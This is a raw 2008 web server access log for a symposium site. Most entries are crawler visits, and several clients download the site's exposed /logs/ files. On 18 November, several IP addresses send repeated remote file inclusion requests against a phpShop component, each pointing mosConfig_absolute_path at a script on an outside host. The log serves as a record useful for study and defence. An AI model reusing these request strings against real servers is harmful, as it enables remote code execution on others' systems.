220.181.61.192 - - [15/Nov/2008:23:21:55 -0500] "GET / HTTP/1.1" 200 326 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 0 www.geil-symposium.com
208.111.154.15 - - [15/Nov/2008:23:55:07 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [15/Nov/2008:23:55:07 -0500] "GET /Scholarship.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
38.99.13.124 - - [16/Nov/2008:00:14:40 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
208.80.194.45 - - [16/Nov/2008:00:24:06 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; SV1; Charter B1; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
193.47.80.36 - - [16/Nov/2008:07:56:35 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
193.47.80.36 - - [16/Nov/2008:07:56:35 -0500] "GET /Sponsors.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
66.235.124.38 - - [16/Nov/2008:11:29:22 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [16/Nov/2008:11:29:23 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
77.57.203.210 - - [16/Nov/2008:14:02:37 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "CHemSE/Nutch-0.9 (ChemSE_crawler; http://www.chemse.com; info123@chemse.com)" 0 www.geil-symposium.com
77.57.203.210 - - [16/Nov/2008:14:02:37 -0500] "GET /logs/ HTTP/1.0" 200 373 "-" "CHemSE/Nutch-0.9 (ChemSE_crawler; http://www.chemse.com; info123@chemse.com)" 0 www.geil-symposium.com
208.80.194.46 - - [16/Nov/2008:15:46:23 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; IEMB3; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
86.86.114.58 - - [16/Nov/2008:17:37:23 -0500] "GET / HTTP/1.1" 200 326 "http://www.google.nl/search?hl=nl&q=parent+directory+%2B+geil&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
208.111.154.16 - - [16/Nov/2008:18:25:17 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [16/Nov/2008:18:25:17 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
72.30.78.239 - - [16/Nov/2008:23:59:14 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.78.239 - - [16/Nov/2008:23:59:15 -0500] "GET /logs/access.log HTTP/1.0" 200 326921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.79.35 - - [17/Nov/2008:00:36:23 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.79.35 - - [17/Nov/2008:00:36:23 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
124.115.0.169 - - [17/Nov/2008:03:26:03 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
124.115.0.169 - - [17/Nov/2008:03:26:04 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
193.47.80.36 - - [17/Nov/2008:03:50:11 -0500] "GET /Program.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
67.15.60.41 - - [17/Nov/2008:05:22:08 -0500] "GET /logs/access.log HTTP/1.1" 200 328046 "-" "access_log-crawler" 1 www.geil-symposium.com
208.111.154.16 - - [17/Nov/2008:06:29:56 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 1 www.geil-symposium.com
208.111.154.16 - - [17/Nov/2008:06:29:56 -0500] "GET /accommodations.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.80.194.34 - - [17/Nov/2008:07:42:16 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SU 2.010; (R1 1.5); .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 0 www.geil-symposium.com
208.111.154.16 - - [17/Nov/2008:10:46:32 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [17/Nov/2008:10:46:32 -0500] "GET /Sponsors.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
67.195.37.190 - - [17/Nov/2008:12:16:24 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.190 - - [17/Nov/2008:12:16:26 -0500] "GET /logs/access.log HTTP/1.0" 200 329376 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 2 www.geil-symposium.com
208.111.154.15 - - [17/Nov/2008:13:48:22 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [17/Nov/2008:13:48:23 -0500] "GET /Program.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
131.107.151.157 - - [17/Nov/2008:16:06:27 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 0 www.geil-symposium.com
213.179.39.209 - - [17/Nov/2008:20:52:18 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "boitho.com-dc/0.82 ( http://www.boitho.com/dcbot.html )" 0 www.geil-symposium.com
64.246.161.190 - - [17/Nov/2008:20:58:05 -0500] "GET /robots.txt HTTP/1.0" 404 - "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
64.246.161.190 - - [17/Nov/2008:20:58:05 -0500] "GET / HTTP/1.1" 200 326 "http://whois.domaintools.com/geil-symposium.com" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
208.80.194.34 - - [17/Nov/2008:21:38:06 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Media Center PC 4.0; Zango 10.0.314.0)" 0 www.geil-symposium.com
38.99.13.124 - - [18/Nov/2008:01:07:48 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
67.15.60.41 - - [18/Nov/2008:05:32:33 -0500] "GET /logs/access.log HTTP/1.1" 200 331055 "-" "access_log-crawler" 1 www.geil-symposium.com
64.246.165.236 - - [18/Nov/2008:10:18:10 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
213.230.206.6 - - [18/Nov/2008:11:12:13 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.811" 0 www.geil-symposium.com
213.230.206.6 - - [18/Nov/2008:11:12:13 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.811" 0 www.geil-symposium.com
213.230.206.6 - - [18/Nov/2008:11:12:13 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.811" 0 www.geil-symposium.com
213.230.206.6 - - [18/Nov/2008:11:19:53 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" 0 www.geil-symposium.com
213.230.206.6 - - [18/Nov/2008:11:19:53 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" 0 www.geil-symposium.com
213.230.206.6 - - [18/Nov/2008:11:19:53 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" 0 www.geil-symposium.com
213.230.206.6 - - [18/Nov/2008:11:20:00 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" 0 www.geil-symposium.com
213.230.206.6 - - [18/Nov/2008:11:20:00 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" 0 www.geil-symposium.com
213.230.206.6 - - [18/Nov/2008:11:20:00 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" 0 www.geil-symposium.com
213.230.206.6 - - [18/Nov/2008:11:20:05 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.61 [en] (OS/2; U)" 0 www.geil-symposium.com
213.230.206.6 - - [18/Nov/2008:11:20:05 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.61 [en] (OS/2; U)" 0 www.geil-symposium.com
213.230.206.6 - - [18/Nov/2008:11:20:05 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.61 [en] (OS/2; U)" 0 www.geil-symposium.com
213.230.206.6 - - [18/Nov/2008:11:20:43 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" 0 www.geil-symposium.com
213.230.206.6 - - [18/Nov/2008:11:20:43 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" 0 www.geil-symposium.com
213.230.206.6 - - [18/Nov/2008:11:20:44 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" 1 www.geil-symposium.com
146.164.26.31 - - [18/Nov/2008:11:22:38 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/feelcomz/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
146.164.26.31 - - [18/Nov/2008:11:22:38 -0500] "GET /logs/error.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/feelcomz/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
146.164.26.31 - - [18/Nov/2008:11:22:38 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/feelcomz/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
189.126.103.159 - - [18/Nov/2008:11:24:02 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/scanrfi/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" 0 www.geil-symposium.com
189.126.103.159 - - [18/Nov/2008:11:24:02 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/scanrfi/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" 0 www.geil-symposium.com
189.126.103.159 - - [18/Nov/2008:11:24:02 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/scanrfi/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" 0 www.geil-symposium.com
189.126.103.159 - - [18/Nov/2008:11:24:55 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/scanrfi/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" 0 www.geil-symposium.com
189.126.103.159 - - [18/Nov/2008:11:24:56 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/scanrfi/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" 0 www.geil-symposium.com
189.126.103.159 - - [18/Nov/2008:11:24:56 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/scanrfi/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" 0 www.geil-symposium.com
146.164.26.31 - - [18/Nov/2008:11:41:35 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/feelcomz/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
208.111.154.15 - - [18/Nov/2008:11:56:14 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [18/Nov/2008:11:56:14 -0500] "GET /Scholarship.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
202.179.180.45 - - [18/Nov/2008:14:10:58 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
202.179.180.45 - - [18/Nov/2008:14:10:58 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
129.241.104.184 - - [18/Nov/2008:14:14:16 -0500] "GET /Registration.html HTTP/1.1" 404 - "-" "boitho.com-dc/0.85 ( http://www.boitho.com/dcbot.html )" 0 www.geil-symposium.com
208.80.194.44 - - [18/Nov/2008:14:47:36 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; ESB{ED54DCA0-ECBF-11D8-9DD2-0050228AF33B})" 0 www.geil-symposium.com
77.126.227.50 - - [18/Nov/2008:15:54:28 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" 0 www.geil-symposium.com
77.126.227.50 - - [18/Nov/2008:15:54:28 -0500] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" 0 www.geil-symposium.com
77.126.227.50 - - [18/Nov/2008:15:54:32 -0500] "GET /logs/ HTTP/1.1" 200 385 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" 0 www.geil-symposium.com
77.126.227.50 - - [18/Nov/2008:15:54:38 -0500] "GET /logs/access.log HTTP/1.1" 200 340003 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 5 www.geil-symposium.com
77.126.227.50 - - [18/Nov/2008:15:54:49 -0500] "GET /logs/error.log HTTP/1.1" 200 204465 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 7 www.geil-symposium.com
208.111.154.15 - - [18/Nov/2008:16:13:13 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [18/Nov/2008:16:13:14 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
67.68.196.90 - - [18/Nov/2008:16:49:41 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 0 www.geil-symposium.com
67.68.196.90 - - [18/Nov/2008:16:49:43 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 0 www.geil-symposium.com
208.80.194.36 - - [18/Nov/2008:18:14:42 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {7E162BBD-2082-4969-96C7-AC68819755D3}; SV1; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
208.111.154.16 - - [18/Nov/2008:18:38:16 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [18/Nov/2008:18:38:16 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
89.248.102.164 - - [18/Nov/2008:21:59:29 -0500] "GET /logs/access.log HTTP/1.0" 200 12753 "-" "Wget/1.10.2" 1 www.geil-symposium.com
89.248.102.164 - - [18/Nov/2008:22:02:07 -0500] "GET /logs/access.log HTTP/1.0" 200 341779 "-" "Wget/1.10.2" 1 www.geil-symposium.com
67.195.37.190 - - [19/Nov/2008:02:40:20 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.190 - - [19/Nov/2008:02:40:21 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
66.249.71.104 - - [19/Nov/2008:03:53:18 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.105 - - [19/Nov/2008:03:53:18 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
208.111.154.16 - - [19/Nov/2008:07:10:34 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [19/Nov/2008:07:10:34 -0500] "GET /Sponsors.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
67.15.60.41 - - [19/Nov/2008:08:10:03 -0500] "GET /logs/access.log HTTP/1.1" 200 343030 "-" "access_log-crawler" 2 www.geil-symposium.com
208.111.154.15 - - [19/Nov/2008:08:58:23 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [19/Nov/2008:08:58:23 -0500] "GET /Scholarship.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
202.160.179.44 - - [19/Nov/2008:10:37:21 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [19/Nov/2008:10:37:30 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
121.131.12.138 - - [19/Nov/2008:14:20:43 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
67.15.60.41 - - [19/Nov/2008:15:16:53 -0500] "GET /logs/access.log HTTP/1.1" 200 344099 "-" "access_log-crawler" 0 www.geil-symposium.com
67.195.37.190 - - [19/Nov/2008:15:43:01 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.190 - - [19/Nov/2008:15:43:01 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.111.154.16 - - [19/Nov/2008:16:33:35 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [19/Nov/2008:16:33:35 -0500] "GET /accommodations.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [19/Nov/2008:17:34:44 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [19/Nov/2008:17:34:44 -0500] "GET /Program.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
67.105.229.164 - - [19/Nov/2008:18:48:30 -0500] "GET /logs/access.log HTTP/1.1" 200 345378 "-" "oAj6vakkAl6fnpyfvbtrcAc" 5 www.geil-symposium.com
208.111.154.15 - - [19/Nov/2008:19:30:51 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [19/Nov/2008:19:30:51 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.80.194.46 - - [19/Nov/2008:20:48:55 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; Zango 10.0.370.0)" 0 www.geil-symposium.com
89.137.234.123 - - [19/Nov/2008:21:33:43 -0500] "GET /logs/access.log HTTP/1.1" 200 346139 "-" "irWakn4foWfc blcexpf" 1 www.geil-symposium.com
38.99.13.124 - - [20/Nov/2008:02:23:24 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
67.195.37.190 - - [20/Nov/2008:06:28:59 -0500] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.190 - - [20/Nov/2008:06:29:11 -0500] "GET /logs/ HTTP/1.0" 200 373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.190 - - [20/Nov/2008:06:31:57 -0500] "GET /logs/error.log HTTP/1.0" 200 208331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 1 www.geil-symposium.com
67.195.37.190 - - [20/Nov/2008:06:33:16 -0500] "GET /logs/access.log HTTP/1.0" 200 347046 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 1 www.geil-symposium.com
208.111.154.15 - - [20/Nov/2008:07:57:31 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [20/Nov/2008:07:57:31 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
67.195.37.190 - - [20/Nov/2008:08:07:23 -0500] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.190 - - [20/Nov/2008:08:07:33 -0500] "GET /logs/ HTTP/1.0" 200 373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.190 - - [20/Nov/2008:08:59:04 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.190 - - [20/Nov/2008:08:59:05 -0500] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
